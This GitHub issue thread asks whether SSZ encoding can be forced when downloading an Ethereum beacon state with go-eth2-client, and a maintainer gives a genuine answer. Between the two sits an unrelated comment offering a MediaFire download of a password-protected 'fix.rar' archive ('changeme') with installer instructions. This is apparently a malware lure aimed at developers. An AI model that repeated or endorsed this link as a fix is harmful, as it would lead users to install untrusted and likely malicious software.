### ISSUE TITLE
Force SSZ?

### ISSUE THREAD

**Issue by jbrower95** [attestantio/go-eth2-client#156]
Is there a mechanism to force SSZ when downloading the beacon state? The SSZ size is significantly smaller (650mb vs. 160mb)

re: https://github.com/attestantio/go-eth2-client/blob/50179b8bd4d75c956248c8af698373fac1ddb6c9/http/beaconstate.go#L34

Thanks!

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mcdee** [comment]
SSZ is the preferred content type for the beacon state request.  JSON will be returned only if the server does not support SSZ, or if the `EnforceJSON()` option is supplied to the client.
